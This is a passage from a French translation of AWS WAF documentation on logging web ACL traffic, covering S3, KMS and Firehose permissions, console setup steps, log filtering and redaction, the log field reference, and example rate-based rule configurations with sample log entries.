                    "aws:SourceAccount": ["111122223333"]
                },
                "ArnLike": {
                    "aws:SourceArn": ["arn:aws:logs:us-east-1:111122223333:*"]
                }
            }
        },
        {
            "Sid": "AWSLogDeliveryAclCheck",
            "Effect": "Allow",
            "Principal": {
                "Service": "delivery.logs.amazonaws.com"
            },
            "Action": "s3:GetBucketAcl",
            "Resource": "arn:aws:s3:::aws-waf-logs-amzn-s3-demo-destination-bucket-suffix",
            "Condition": {
                "StringEquals": {
                "aws:SourceAccount": ["111122223333"]
                },
                "ArnLike": {
                "aws:SourceArn": ["arn:aws:logs:us-east-1:111122223333:*"]
                }
            }
        }
    ]
}
```

------

**Note**  
Dans certains cas, des erreurs `AccessDenied` peuvent apparaître dans AWS CloudTrail si l'autorisation `s3:ListBucket` n'a pas été accordée à `delivery.logs.amazonaws.com`. Pour éviter ces erreurs dans vos CloudTrail journaux, vous devez accorder l'`s3:ListBucket`autorisation `delivery.logs.amazonaws.com` et inclure les `Condition` paramètres indiqués dans l'`s3:GetBucketAcl `autorisation définie dans la politique de compartiment précédente. Pour simplifier les choses, au lieu d'en créer un nouveau`Statement`, vous pouvez directement le mettre `AWSLogDeliveryAclCheck` à jour`“Action”: [“s3:GetBucketAcl”, “s3:ListBucket”]`.

## Autorisations d'utilisation AWS Key Management Service avec une clé KMS
<a name="logging-s3-permissions-encrypt-kms"></a>

Si votre destination de journalisation utilise le chiffrement côté serveur avec des clés stockées dans AWS Key Management Service (SSE-KMS) et que vous utilisez une clé gérée par le client (clé KMS), vous devez AWS WAF autoriser l'utilisation de votre clé KMS. Pour ce faire, vous ajoutez une politique clé à la clé KMS pour la destination que vous avez choisie. Cela permet à la AWS WAF journalisation d'écrire vos fichiers journaux vers votre destination. 

Ajoutez la politique de clé suivante à votre clé KMS AWS WAF pour autoriser la connexion à votre compartiment Amazon S3.

```
{
    "Sid": "Allow AWS WAF to use the key",
    "Effect": "Allow",
    "Principal": {
        "Service": [
            "delivery.logs.amazonaws.com"
        ]
    },
    "Action": "kms:GenerateDataKey*",
    "Resource": "*"
}
```

## Autorisations requises pour accéder aux fichiers journaux Amazon S3
<a name="logging-s3-log-file-access"></a>

Amazon S3 utilise des listes de contrôle d'accès (ACLs) pour gérer l'accès aux fichiers journaux créés par un AWS WAF journal. Par défaut, le propriétaire du compartiment dispose d'autorisations `FULL_CONTROL` sur chaque fichier journal. Si le propriétaire de la diffusion des journaux n'est pas le propriétaire du compartiment, il ne dispose d'aucune autorisation. Le compte de diffusion des journaux possède les autorisations `READ` et `WRITE`. Pour de plus amples informations, veuillez consulter [Présentation des listes de contrôle d'accès (ACL)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/acl-overview.html) dans le *Guide du développeur Amazon Simple Storage Service*.

# Envoi des journaux de trafic du pack de protection (ACL Web) à un flux de diffusion Amazon Data Firehose
<a name="logging-kinesis"></a>

Cette section fournit des informations sur l'envoi des journaux de trafic de votre pack de protection (ACL Web) vers un flux de diffusion Amazon Data Firehose. 

**Note**  
La connexion vous est facturée en plus des frais d'utilisation AWS WAF. Pour plus d'informations, consultez [Tarification des informations relatives au trafic du pack de protection de journalisation (ACL Web)](logging-pricing.md).

Pour envoyer des journaux à Amazon Data Firehose, vous devez envoyer des journaux depuis votre pack de protection (ACL Web) vers un flux de diffusion Amazon Data Firehose que vous configurez dans Firehose. Après avoir activé la journalisation, AWS WAF envoie les journaux à votre destination de stockage via le point de terminaison HTTPS de Firehose. 

Un AWS WAF journal équivaut à un enregistrement Firehose. Si vous recevez généralement 10 000 requêtes par seconde et que vous activez les journaux complets, vous devriez avoir un paramètre de 10 000 enregistrements par seconde dans Firehose. Si vous ne configurez pas correctement Firehose, tous les journaux ne AWS WAF seront pas enregistrés. Pour plus d'informations, consultez la section [Quotas Amazon Kinesis Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/limits.html). 

Pour plus d'informations sur la façon de créer un flux de diffusion Amazon Data Firehose et de consulter vos journaux enregistrés, consultez [Qu'est-ce qu'Amazon Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/what-is-this-service.html) ? 

Pour en savoir plus sur la création des flux de diffusion, consultez [Création d’un flux de diffusion Amazon Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/basic-create.html).

## Configuration d'un flux de diffusion Amazon Data Firehose pour votre pack de protection (ACL Web)
<a name="logging-kinesis-configuration"></a>

Configurez un flux de diffusion Amazon Data Firehose pour votre pack de protection (ACL Web) comme suit.
+ Créez-le en utilisant le même compte que celui que vous utilisez pour gérer le pack de protection (ACL Web).
+ Créez-le dans la même région que le pack de protection (ACL Web). Si vous capturez des journaux pour Amazon CloudFront, créez le firehose dans la région USA Est (Virginie du Nord),`us-east-1`.
+ Donnez au data firehose un nom commençant par le préfixe`aws-waf-logs-`. Par exemple, `aws-waf-logs-us-east-2-analytics`.
+ Configurez-le pour le téléchargement direct, ce qui permet aux applications d'accéder directement au flux de diffusion. Dans la [console Amazon Data Firehose](https://console.aws.amazon.com/firehose), pour le paramètre **Source** du flux de diffusion, choisissez **Direct PUT ou autres** sources. Par le biais de l'API, définissez la propriété du flux `DeliveryStreamType` de diffusion sur`DirectPut`.
**Note**  
N'utilisez pas a `Kinesis stream` comme source.

## Autorisations requises pour publier des journaux dans un flux de diffusion Amazon Data Firehose
<a name="logging-kinesis-permissions"></a>

Pour comprendre les autorisations requises pour votre configuration Kinesis Data Firehose[, consultez la section Contrôle des accès avec Amazon Kinesis Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/controlling-access.html).

Vous devez disposer des autorisations suivantes pour activer correctement la journalisation du pack de protection (ACL Web) avec un flux de diffusion Amazon Data Firehose.
+ `iam:CreateServiceLinkedRole`
+ `firehose:ListDeliveryStreams`
+ `wafv2:PutLoggingConfiguration`

Pour plus d'informations sur les rôles liés aux services et les `iam:CreateServiceLinkedRole` autorisations, consultez. [Utilisation de rôles liés à un service pour AWS WAF](using-service-linked-roles.md)

# Configuration de la journalisation pour un pack de protection (ACL Web)
<a name="logging-management-configure"></a>

Cette section fournit des instructions pour configurer la protection des données pour un pack de protection (ACL Web).

**Note**  
La connexion vous est facturée en plus des frais d'utilisation AWS WAF. Pour plus d'informations, consultez [Tarification des informations relatives au trafic du pack de protection de journalisation (ACL Web)](logging-pricing.md).

Pour activer la journalisation pour un pack de protection (ACL Web), vous devez déjà avoir configuré la destination de journalisation que vous allez utiliser. Pour plus d'informations sur vos choix de destinations et les exigences relatives à chacune d'entre elles, consultez[AWS WAF destinations de journalisation](logging-destinations.md).

**Pour configurer la journalisation pour un pack de protection (ACL Web)**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, choisissez les **packs de protection (Web ACLs)**.

1. Choisissez le nom du pack de protection (ACL Web) pour lequel vous souhaitez activer la journalisation. La console vous amène à la description du pack de protection (ACL Web), où vous pouvez le modifier.

1. Dans l'onglet **Journalisation et mesures**, choisissez **Activer la journalisation**.

1. Choisissez le type de destination de journalisation, puis choisissez la destination de journalisation que vous avez configurée. Vous devez choisir une destination de journalisation dont le nom commence par`aws-waf-logs-`.

1. (Facultatif) Si vous ne souhaitez pas que certains champs soient inclus dans les journaux, supprimez-les. Choisissez le champ à censurer, puis choisissez **Ajouter**. Répétez si nécessaire pour censurer des champs supplémentaires. Les champs expurgés apparaissent dans les journaux sous `xxx` la forme.
**Note**  
Ce paramètre n'a aucun impact sur l'échantillonnage des demandes. Vous pouvez exclure des champs de l'échantillonnage des demandes en configurant la protection des données du pack de protection (ACL Web) ou en désactivant l'échantillonnage pour le pack de protection (ACL Web). 

1. (Facultatif) Si vous ne souhaitez pas envoyer toutes les demandes aux journaux, ajoutez vos critères de filtrage et votre comportement. Sous **Filtrer les journaux**, pour chaque filtre que vous souhaitez appliquer, choisissez **Ajouter un filtre**, puis choisissez vos critères de filtrage et indiquez si vous souhaitez conserver ou supprimer les demandes correspondant à ces critères. Lorsque vous avez fini d'ajouter des filtres, modifiez si nécessaire le **comportement de journalisation par défaut**. 
**Note**  
Si vous ajoutez plusieurs filtres, il les AWS WAF évalue en commençant par le haut.

1. Choisissez **Activer la journalisation**.
**Note**  
Lorsque vous activez correctement la journalisation, AWS WAF un rôle lié à un service est créé avec les autorisations nécessaires pour écrire des journaux sur la destination de journalisation. Pour de plus amples informations, veuillez consulter [Utilisation de rôles liés à un service pour AWS WAF](using-service-linked-roles.md).

# Trouver les enregistrements de votre pack de protection (ACL Web)
<a name="logging-management"></a>

Cette section explique comment trouver les enregistrements de votre pack de protection (ACL Web).

**Note**  
La connexion vous est facturée en plus des frais d'utilisation AWS WAF. Pour plus d'informations, consultez [Tarification des informations relatives au trafic du pack de protection de journalisation (ACL Web)](logging-pricing.md).

**Si vous ne trouvez aucun enregistrement de journal dans vos journaux**  
En de rares occasions, il est possible que le taux de livraison des AWS WAF grumes tombe en dessous de 100 %, les journaux étant livrés dans la mesure du possible. L' AWS WAF architecture donne la priorité à la sécurité de vos applications par rapport à toute autre considération. Dans certaines situations, par exemple lorsque les flux de journalisation sont soumis à une limitation du trafic, cela peut entraîner la suppression d'enregistrements. Cela ne devrait pas affecter plus que quelques enregistrements. Si vous remarquez un certain nombre d'entrées de journal manquantes, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/).

Dans la configuration de journalisation de votre pack de protection (ACL Web), vous pouvez personnaliser ce qui est AWS WAF envoyé aux journaux.
+ **Rédaction des champs** : vous pouvez supprimer les champs suivants des enregistrements du journal pour les règles qui utilisent les paramètres de correspondance correspondants : **chemin d'URI**, **chaîne de requête**, **en-tête unique** et méthode **HTTP**. Les champs expurgés apparaissent comme `REDACTED` dans les journaux. Par exemple, si vous supprimez le champ **Chaîne de requête**, dans les journaux, il sera répertorié comme `REDACTED` pour toutes les règles utilisant le paramètre de correspondance des **chaînes de requête**. **La rédaction s'applique uniquement au composant de demande que vous spécifiez pour la correspondance dans la règle, de sorte que la rédaction du composant d'**en-tête unique** ne s'applique pas aux règles qui correspondent aux en-têtes.** Pour obtenir la liste des champs du journal, consultez[Champs de journal pour le trafic du pack de protection (ACL Web)](logging-fields.md).
**Note**  
Ce paramètre n'a aucun impact sur l'échantillonnage des demandes. Vous pouvez exclure des champs de l'échantillonnage des demandes en configurant la protection des données du pack de protection (ACL Web) ou en désactivant l'échantillonnage pour le pack de protection (ACL Web). 
+ **Filtrage des journaux** : vous pouvez ajouter un filtrage pour spécifier les requêtes Web qui sont conservées dans les journaux et celles qui sont supprimées. Vous filtrez les paramètres qui AWS WAF s'appliquent lors de l'évaluation de la demande Web. Vous pouvez filtrer selon les paramètres suivants : 
  + **Étiquette entièrement qualifiée** : les étiquettes entièrement qualifiées ont un préfixe, des espaces de noms facultatifs et un nom d'étiquette. Le préfixe identifie le contexte du groupe de règles ou du pack de protection (ACL Web) de la règle qui a ajouté l'étiquette. Pour plus d'informations sur les étiquettes, consultez[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).
  + **Action par règle** : vous pouvez filtrer sur n'importe quel paramètre d'action de règle normal ainsi que sur l'ancienne option de `EXCLUDED_AS_COUNT` remplacement pour les règles de groupe de règles. Pour plus d'informations sur les paramètres d'action des règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). Pour plus d'informations sur les dérogations aux actions des règles actuelles et anciennes pour les règles de groupe de règles, consultez[Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md). 
    + Les filtres d'action de règle normaux s'appliquent aux actions configurées dans les règles ainsi qu'aux actions configurées à l'aide de l'option actuelle permettant de remplacer une action de règle de groupe de règles. 
    + Le filtre du `EXCLUDED_AS_COUNT` journal chevauche le filtre du journal des `Count` actions. `EXCLUDED_AS_COUNT`filtre à la fois les options actuelles et héritées pour remplacer une action de règle de groupe de règles surCount. 

# Champs de journal pour le trafic du pack de protection (ACL Web)
<a name="logging-fields"></a>

La liste suivante décrit les champs de journal possibles. 

**action**  
Action de fin AWS WAF appliquée à la demande. Cela indique une autorisation, un blocage, un CAPTCHA ou un défi. Les Challenge actions CAPTCHA et prennent fin lorsque la requête Web ne contient pas de jeton valide.

**args**  
Chaîne de requête.

**Réponse au captcha**  
État de l'action CAPTCHA pour la demande, renseigné lorsqu'une CAPTCHA action est appliquée à la demande. Ce champ est renseigné pour toute CAPTCHA action, qu'elle soit terminale ou non. Si l'CAPTCHAaction est appliquée plusieurs fois à une demande, ce champ est renseigné à partir de la dernière fois que l'action a été appliquée.   
L'CAPTCHAaction met fin à l'inspection des demandes Web lorsque la demande n'inclut pas de jeton ou lorsque le jeton n'est pas valide ou a expiré. Si l'CAPTCHAaction prend fin, ce champ inclut un code de réponse et le motif de l'échec. Si l'action n'est pas terminée, ce champ inclut un horodatage de résolution. Pour différencier une action terminante d'une action non terminale, vous pouvez filtrer un `failureReason` attribut non vide dans ce champ.

**cfDistributionTenantId**  
Identifiant du locataire CloudFront de distribution associé à la demande Web. Ce champ est facultatif et s'applique uniquement aux packs de protection (Web ACLs) associés aux locataires CloudFront de distribution.

**Réponse au défi**  
État de l'action de défi pour la demande, renseigné lorsqu'une Challenge action est appliquée à la demande. Ce champ est renseigné pour toute Challenge action, qu'elle soit terminale ou non. Si l'Challengeaction est appliquée plusieurs fois à une demande, ce champ est renseigné à partir de la dernière fois que l'action a été appliquée.   
L'Challengeaction met fin à l'inspection des demandes Web lorsque la demande n'inclut pas de jeton ou lorsque le jeton n'est pas valide ou a expiré. Si l'Challengeaction prend fin, ce champ inclut un code de réponse et le motif de l'échec. Si l'action n'est pas terminée, ce champ inclut un horodatage de résolution. Pour différencier une action terminante d'une action non terminale, vous pouvez filtrer un `failureReason` attribut non vide dans ce champ.

**Client ASN**  
Numéro de système autonome (ASN) associé à l'adresse IP d'origine de la requête Web.  
**ClientASN** est connecté AWS WAF aux journaux uniquement lorsqu'une instruction ASN match est utilisée. Dans le cas contraire, ce champ n'est pas enregistré.

**clientIp**  
Adresse IP du client envoyant la requête.

**country**  
Pays source de la requête. S'il n' AWS WAF est pas en mesure de déterminer le pays d'origine, il définit ce champ sur`-`. 

**country**  
Pays source de la requête. S'il n' AWS WAF est pas en mesure de déterminer le pays d'origine, il définit ce champ sur`-`. 

**excludedRules**  
Utilisé uniquement pour les règles de groupe de règles. Liste des règles dans le groupe de règles que vous avez exclues. L'action associée à ces règles est définie surCount.   
Si vous remplacez une règle pour qu'elle soit prise en compte à l'aide de l'option d'action de remplacement de la règle, les correspondances ne sont pas répertoriées ici. Ils sont répertoriés sous forme de paires d'actions `action` et`overriddenAction`.    
exclusionType  
Type qui indique que la règle exclue a une actionCount.  
ruleId  
ID de la règle au sein du groupe de règles qui est exclu.

**formatVersion**  
Version du format du journal.

**ASN transféré**  
Numéro de système autonome (ASN) associé à l'adresse IP de l'entité qui a transmis la demande Web.

**headers**  
Liste des en-têtes.

**httpMethod**  
Méthode HTTP de la requête.

**httpRequest**  
Métadonnées relatives à la requête.

**httpSourceId**  
L'ID de la ressource associée :   
+ Pour une CloudFront distribution Amazon, l'ID est celui indiqué `distribution-id` dans la syntaxe de l'ARN : 

  `arn:partitioncloudfront::account-id:distribution/distribution-id` 
+ Pour un Application Load Balancer, l'ID est le suivant `load-balancer-id` dans la syntaxe de l'ARN : 

  `arn:partition:elasticloadbalancing:region:account-id:loadbalancer/app/load-balancer-name/load-balancer-id`
+ Pour une API REST Amazon API Gateway, l'ID est celui `api-id` indiqué dans la syntaxe ARN : 

  `arn:partition:apigateway:region::/restapis/api-id/stages/stage-name`
+ Pour une API AWS AppSync GraphQL, l'ID est celui indiqué `GraphQLApiId` dans la syntaxe de l'ARN : 

  `arn:partition:appsync:region:account-id:apis/GraphQLApiId`
+ Pour un groupe d'utilisateurs Amazon Cognito, l'identifiant est celui indiqué `user-pool-id` dans la syntaxe ARN : 

  `arn:partition:cognito-idp:region:account-id:userpool/user-pool-id`
+ Pour un AWS App Runner service, l'ID est celui indiqué `apprunner-service-id` dans la syntaxe de l'ARN : 

  `arn:partition:apprunner:region:account-id:service/apprunner-service-name/apprunner-service-id`

**httpSourceName**  
Source de la requête. Valeurs possibles : `CF` pour Amazon CloudFront, `APIGW` pour Amazon API Gateway, `ALB` pour Application Load Balancer, `APPSYNC` pour, pour Amazon Cognito AWS AppSync`APPRUNNER`, `COGNITOIDP` pour App Runner `VERIFIED_ACCESS` et pour Verified Access.

**httpVersion**  
Version de HTTP.

**Empreinte digitale JA3**  
L' JA3 empreinte digitale de la demande.  
JA3 l'inspection des empreintes digitales n'est disponible que pour les CloudFront distributions Amazon et les équilibreurs de charge d'application.
L' JA3 empreinte digitale est un hachage de 32 caractères dérivé du client TLS Hello d'une demande entrante. Cette empreinte sert d'identifiant unique pour la configuration TLS du client. AWS WAF calcule et enregistre cette empreinte pour chaque demande contenant suffisamment d'informations TLS Client Hello pour le calcul.   
Vous fournissez cette valeur lorsque vous configurez une correspondance JA3 d'empreintes digitales dans les règles de votre pack de protection (ACL Web). Pour plus d'informations sur la création d'une correspondance par rapport à l' JA3empreinte digitale, reportez-vous [JA3 empreinte digitale](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-ja3-fingerprint) à l'instruction [Demandez des composants dans AWS WAF](waf-rule-statement-fields-list.md) for a rule.

**Empreinte digitale JA4**  
L' JA4 empreinte digitale de la demande.  
JA4 l'inspection des empreintes digitales n'est disponible que pour les CloudFront distributions Amazon et les équilibreurs de charge d'application.
L' JA4 empreinte digitale est un hachage de 36 caractères dérivé du client TLS Hello d'une demande entrante. Cette empreinte sert d'identifiant unique pour la configuration TLS du client. AWS WAF calcule et enregistre cette empreinte pour chaque demande contenant suffisamment d'informations TLS Client Hello pour le calcul.   
Vous fournissez cette valeur lorsque vous configurez une correspondance JA4 d'empreintes digitales dans les règles de votre pack de protection (ACL Web). Pour plus d'informations sur la création d'une correspondance par rapport à l' JA4empreinte digitale, reportez-vous [JA4 empreinte digitale](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-ja4-fingerprint) à l'instruction [Demandez des composants dans AWS WAF](waf-rule-statement-fields-list.md) for a rule.

**labels**  
Les étiquettes figurant sur la demande Web. Ces labels ont été appliqués par des règles qui ont été utilisées pour évaluer la demande. AWS WAF enregistre les 100 premières étiquettes. 

**nonTerminatingMatchingRègles**  
Liste des règles non résilientes correspondant à la demande. Chaque élément de la liste contient les informations suivantes.     
action  
Action AWS WAF appliquée à la demande. Cela indique soit le nombre, soit le CAPTCHA, soit le défi. ChallengeLes CAPTCHA et ne se terminent pas lorsque la requête Web contient un jeton valide.  
ruleId  
L'ID de la règle qui correspondait à la demande et qui ne se terminait pas.   
ruleMatchDetails  
Informations détaillées sur la règle correspondant à la demande. Ce champ est uniquement renseigné pour les instructions de règles d'injection SQL et de correspondance entre les scripts intersites (XSS). Une règle de correspondance peut nécessiter une correspondance pour plusieurs critères d'inspection. Ces détails de correspondance sont donc fournis sous la forme d'un tableau de critères de correspondance. 
Toute information supplémentaire fournie pour chaque règle varie en fonction de facteurs tels que la configuration de la règle, le type de correspondance des règles et les détails de la correspondance. Par exemple, pour les règles comportant une Challenge action CAPTCHA ou, le `captchaResponse` ou `challengeResponse` sera répertorié. Si la règle correspondante se trouve dans un groupe de règles et que vous avez remplacé son action de règle configurée, l'action configurée sera fournie dans. `overriddenAction` 

**Champs surdimensionnés**  
Liste des champs de la requête Web qui ont été inspectés par le pack de protection (ACL Web) et qui dépassent la limite AWS WAF d'inspection. Si un champ est surdimensionné mais que le pack de protection (ACL Web) ne l'inspecte pas, il ne sera pas répertorié ici.   
Cette liste peut contenir zéro ou plusieurs des valeurs suivantes : `REQUEST_BODY``REQUEST_JSON_BODY`,`REQUEST_HEADERS`, et`REQUEST_COOKIES`. Pour plus d'informations sur les champs surdimensionnés, consultez[Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).

**rateBasedRuleListe**  
Liste de règles basées sur le débit qui ont agi sur la requête. Pour plus d'informations sur les règles basées sur les taux, consultez[Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md).    
rateBasedRuleId  
ID de la règle basée sur le débit qui a agi sur la requête. Si cette règle a résilié la requête, l'ID pour `rateBasedRuleId` est le même que pour `terminatingRuleId`.  
rateBasedRuleNom  
Nom de la règle basée sur le taux qui a donné suite à la demande.   
limitKey  
Type d'agrégation utilisé par la règle. Les valeurs possibles concernent l'origine de la `IP` demande Web, `FORWARDED_IP` une adresse IP transmise dans un en-tête de la `CUSTOMKEYS` demande, des paramètres clés agrégés personnalisés et `CONSTANT` le comptage de toutes les demandes ensemble, sans agrégation.   
Valeur limite  
Utilisé uniquement en cas de limitation du débit par un seul type d'adresse IP. Si une demande contient une adresse IP non valide, `limitvalue` c'est`INVALID`.  
maxRateAllowed  
Le nombre maximum de demandes autorisées dans la fenêtre temporelle spécifiée pour une instance d'agrégation spécifique. L'instance d'agrégation est définie par l'ajout `limitKey` de toutes les spécifications clés supplémentaires que vous avez fournies dans la configuration des règles basées sur le taux.   
evaluationWindowSec  
Le temps AWS WAF inclus dans sa demande compte, en secondes.   
Valeurs personnalisées  
Valeurs uniques identifiées par la règle basée sur le taux dans la demande. Pour les valeurs de chaîne, les journaux impriment les 32 premiers caractères de la valeur de chaîne. Selon le type de clé, ces valeurs peuvent être uniquement pour une clé, comme pour la méthode HTTP ou la chaîne de requête, ou pour une clé et un nom, comme pour l'en-tête et le nom de l'en-tête. 

**requestHeadersInserted**  
La liste des en-têtes insérés pour le traitement personnalisé des demandes.

**requestId**  
ID de la demande, qui est généré par le service hôte sous-jacent. Pour Application Load Balancer, il s'agit de l'ID de trace. Pour tous les autres, il s'agit de l'ID de demande. 

**responseCodeSent**  
Le code de réponse envoyé avec une réponse personnalisée.

**ruleGroupId**  
ID du groupe de règles. Si la règle a bloqué la requête, l'ID pour `ruleGroupID` est le même que pour `terminatingRuleId`. 

**ruleGroupList**  
Liste des groupes de règles ayant répondu à cette demande, avec les informations correspondantes.

**terminatingRule**  
Règle qui a mis fin à la demande. S'il est présent, il contient les informations suivantes.     
action  
Action de fin AWS WAF appliquée à la demande. Cela indique une autorisation, un blocage, un CAPTCHA ou un défi. Les Challenge actions CAPTCHA et prennent fin lorsque la requête Web ne contient pas de jeton valide.  
ruleId  
ID de la règle correspondant à la demande.   
ruleMatchDetails  
Informations détaillées sur la règle correspondant à la demande. Ce champ est uniquement renseigné pour les instructions de règles d'injection SQL et de correspondance entre les scripts intersites (XSS). Une règle de correspondance peut nécessiter une correspondance pour plusieurs critères d'inspection. Ces détails de correspondance sont donc fournis sous la forme d'un tableau de critères de correspondance. 
Toute information supplémentaire fournie pour chaque règle varie en fonction de facteurs tels que la configuration de la règle, le type de correspondance des règles et les détails de la correspondance. Par exemple, pour les règles comportant une Challenge action CAPTCHA ou, le `captchaResponse` ou `challengeResponse` sera répertorié. Si la règle correspondante se trouve dans un groupe de règles et que vous avez remplacé son action de règle configurée, l'action configurée sera fournie dans. `overriddenAction` 

**terminatingRuleId**  
ID de la règle qui a résilié la requête. Si rien ne résilie la requête, la valeur est `Default_Action`.

**terminatingRuleMatchDétails**  
Informations détaillées sur la règle de fin correspondant à la demande. Une règle de fin comporte une action qui met fin au processus d'inspection par rapport à une demande Web. Les actions possibles pour une règle de résiliation sont les suivantes : AllowBlock,CAPTCHA, etChallenge. Lors de l'inspection d'une requête Web, la première règle qui correspond à la demande et qui comporte une action de fin AWS WAF arrête l'inspection et applique l'action. La requête Web peut contenir d'autres menaces, en plus de celle signalée dans le journal pour la règle de terminaison correspondante.  
Cette information n'est renseignée que pour les instructions de règle de correspondance d'injection SQL et de script inter-site (XSS). La règle de correspondance peut nécessiter une correspondance pour plusieurs critères d'inspection. Ces détails de correspondance sont donc fournis sous la forme d'un tableau de critères de correspondance. 

**terminatingRuleType**  
Type de règle qui a résilié la requête. Valeurs possibles : RATE\$1BASED, REGULAR, GROUP et MANAGED\$1RULE\$1GROUP.

**timestamp**  
L'horodatage en millisecondes.

**uri**  
URI de la requête. 

**fragment**  
Partie d'une URL qui suit le symbole « \$1 » et qui fournit des informations supplémentaires sur la ressource, par exemple \$1section2.

**webaclId**  
GUID du pack de protection (ACL Web).

# Exemples de journaux pour le trafic du pack de protection (ACL Web)
<a name="logging-examples"></a>

Cette section fournit des exemples de journalisation du trafic du pack de protection (ACL Web).

**Example Règle 1 basée sur le taux : configuration des règles avec une seule clé, définie sur `Header:dogname`**  

```
    {
      "Name": "RateBasedRule",
      "Priority": 1,
      "Statement": {
        "RateBasedStatement": {
          "Limit": 100,
          "AggregateKeyType": "CUSTOM_KEYS",
          "CustomKeys": [
            {
              "Header": {
                "Name": "dogname",
                "TextTransformations": [
                  {
                    "Priority": 0,
                    "Type": "NONE"
                  }
                ]
              }
            }
          ]
        }
      },
      "Action": {
        "Block": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "RateBasedRule"
      }
    }
```

**Example Règle basée sur le taux 1 : entrée dans le journal pour une demande bloquée par une règle basée sur le taux**  

```
{
   "timestamp":1683355579981,
   "formatVersion":1,
   "webaclId": ...,
   "terminatingRuleId":"RateBasedRule",
   "terminatingRuleType":"RATE_BASED",
   "action":"BLOCK",
   "terminatingRuleMatchDetails":[
      
   ],
   "httpSourceName":"APIGW",
   "httpSourceId":"EXAMPLE11:rjvegx5guh:CanaryTest",
   "ruleGroupList":[
      
   ],
   "rateBasedRuleList":[
      {
         "rateBasedRuleId": ...,
         "rateBasedRuleName":"RateBasedRule",
         "limitKey":"CUSTOMKEYS",
         "maxRateAllowed":100,
         "evaluationWindowSec":"120",
         "customValues":[
            {
               "key":"HEADER",
               "name":"dogname",
               "value":"ella"
            }
         ]
      }
   ],
   "nonTerminatingMatchingRules":[
      
   ],
   "requestHeadersInserted":null,
   "responseCodeSent":null,
   "httpRequest":{
      "clientIp":"52.46.82.45",
      "country":"FR",
      "headers":[
         {
            "name":"X-Forwarded-For",
            "value":"52.46.82.45"
         },
         {
            "name":"X-Forwarded-Proto",
            "value":"https"
         },
         {
            "name":"X-Forwarded-Port",
            "value":"443"
         },
         {
            "name":"Host",
            "value":"rjvegx5guh.execute-api.eu-west-3.amazonaws.com"
         },
         {
            "name":"X-Amzn-Trace-Id",
            "value":"Root=1-645566cf-7cb058b04d9bb3ee01dc4036"
         },
         {
            "name":"dogname",
            "value":"ella"
         },
         {
            "name":"User-Agent",
            "value":"RateBasedRuleTestKoipOneKeyModulePV2"
         },
         {
            "name":"Accept-Encoding",
            "value":"gzip,deflate"
         }
      ],
      "uri":"/CanaryTest",
      "args":"",
      "httpVersion":"HTTP/1.1",
      "httpMethod":"GET",
      "requestId":"Ed0AiHF_CGYF-DA="
   }
}
```

**Example Règle 2 basée sur le taux : configuration des règles avec deux clés, définies sur et `Header:dogname` `Header:catname`**  

```
    {
      "Name": "RateBasedRule",
      "Priority": 1,
      "Statement": {
        "RateBasedStatement": {
          "Limit": 100,
          "AggregateKeyType": "CUSTOM_KEYS",
          "CustomKeys": [
            {
              "Header": {
                "Name": "dogname",
                "TextTransformations": [
                  {
                    "Priority": 0,
                    "Type": "NONE"
                  }
                ]
              }
            },
            {
              "Header": {
                "Name": "catname",
                "TextTransformations": [
                  {
                    "Priority": 0,
                    "Type": "NONE"
                  }
                ]
              }
            }
          ]
        }
      },
      "Action": {
        "Block": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "RateBasedRule"
      }
    }
```

**Example Règle basée sur le taux 2 : entrée dans le journal pour une demande bloquée par une règle basée sur le taux**  

```
{
   "timestamp":1633322211194,
   "formatVersion":1,
   "webaclId":...,
   "terminatingRuleId":"RateBasedRule",
   "terminatingRuleType":"RATE_BASED",
   "action":"BLOCK",
   "terminatingRuleMatchDetails":[
      
   ],
   "httpSourceName":"APIGW",
   "httpSourceId":"EXAMPLE11:rjvegx5guh:CanaryTest",
   "ruleGroupList":[
      
   ],
   "rateBasedRuleList":[
      {
         "rateBasedRuleId":...,
         "rateBasedRuleName":"RateBasedRule",
         "limitKey":"CUSTOMKEYS",
         "maxRateAllowed":100,
         "evaluationWindowSec":"120",
         "customValues":[
            {
               "key":"HEADER",
               "name":"dogname",
               "value":"ella"
            },
            {
               "key":"HEADER",
               "name":"catname",
               "value":"goofie"
            }
         ]
      }
   ],
   "nonTerminatingMatchingRules":[
      
   ],
   "requestHeadersInserted":null,
   "responseCodeSent":null,
   "httpRequest":{
      "clientIp":"52.46.82.35",
      "country":"FR",
      "headers":[
         {
            "name":"X-Forwarded-For",
            "value":"52.46.82.35"
         },
         {
            "name":"X-Forwarded-Proto",
            "value":"https"
         },
         {
            "name":"X-Forwarded-Port",
            "value":"443"
         },
         {
            "name":"Host",
            "value":"23llbyn8v3.execute-api.eu-west-3.amazonaws.com"
         },
         {
            "name":"X-Amzn-Trace-Id",
            "value":"Root=1-64556629-17ac754c2ed9f0620e0f2a0c"
         },
         {
            "name":"catname",
            "value":"goofie"
         },
         {
            "name":"dogname",
            "value":"ella"
         },
         {
            "name":"User-Agent",
            "value":"Apache-HttpClient/UNAVAILABLE (Java/11.0.19)"
         },
         {
            "name":"Accept-Encoding",
            "value":"gzip,deflate"
         }
      ],
      "uri":"/CanaryTest",
